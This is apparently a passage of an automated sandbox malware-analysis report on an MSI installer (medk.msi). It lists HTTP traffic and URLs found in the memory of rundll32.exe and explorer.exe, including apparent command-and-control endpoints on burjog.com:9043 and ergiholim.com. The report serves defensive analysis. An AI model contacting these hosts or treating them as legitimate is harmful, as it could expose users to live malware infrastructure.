            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ul3wDHWBtDtV4CecVC%2BthOkAynJZ%2BVUwI2yQHNCmaM3M3UNzqPfHo4sPm2GP2px4nQ2zd6BXPvmdCzdL3pqkf%2Bnz%2FtP9o81hFYCYqmxc4ticF%2By3xW3nVsfa%2F6yAdVY7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073e5cc2ef661-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137741&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=21023&cwnd=32&unsent_bytes=0&cid=754fa116d078c5c9&ts=796&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:24:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyVBkPNy41tq298pu4n33CS1Ev%2BnEqwvov1tbJoTlZW%2FNTge1DMj5c4gyx5l2mcBk4DIjkbAkIvqmhhmW%2FKK9QxYFih7W3sGUqWzgShQzOLRfkEQu6bv7NPfCV71VaJ0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073f11e3925fb-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=138192&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20897&cwnd=32&unsent_bytes=0&cid=b5e9611d9260418d&ts=744&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:24:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGtY3IjLAUJPWyE1wcH3yqVlbnrAuxWmh%2B%2FQ10uhPIukqT4Vnr31VlkxbEHcWHOdDp4scBOZp7p4617%2FiRZ1Lozx28cJeidDuygO60zpYrapfQUZdEKrrlEQejZUWDAE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2073f918922ccb-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1575&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=1960731&cwnd=114&unsent_bytes=0&cid=f174f0bd30c35b1b&ts=732&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:24:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=77Yn8nPOS%2BnC%2BOaDiM2kr1yN5VP9DXBfkemMJ%2Ba%2BB8%2BXcj1T8yTIEFb%2FewfIpdU95t9DVnG5tuzFaf%2B9m1WQ9X6WDYhpW9%2B6EsZKY4Nb4YfkIyMX7zJBvjiB4qVl%2Fj4Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207403981bd791-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=132759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=19707&cwnd=32&unsent_bytes=0&cid=3e8c045f2fe6e30b&ts=876&x=0"
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: explorer.exe, 00000008.00000000.2237668120.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: explorer.exe, 00000008.00000000.2237668120.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 00000008.00000000.2237668120.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: explorer.exe, 00000008.00000000.2237668120.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 00000008.00000002.4567822986.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2236079810.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4578819084.0000000007B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://t2.symcb.com0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://tl.symcd.com0&
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311ABF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311ABF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: explorer.exe, 00000008.00000000.2238643975.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980638609.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: explorer.exe, 00000008.00000002.4590045694.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2242782012.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
            Source: explorer.exe, 00000008.00000002.4581549359.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000008.00000002.4581549359.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com/
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/
            Source: rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/der
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.php
            Source: rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.phpN
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.phpdOga
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.phpwOva
            Source: rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/matrix.php~
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.php
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.phpAHJ
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.phpjJ
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/neo.phptJZa
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/pankihoy.php
            Source: rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burjog.com:9043/pankihoy.phpCryptographyQJga
            Source: explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/
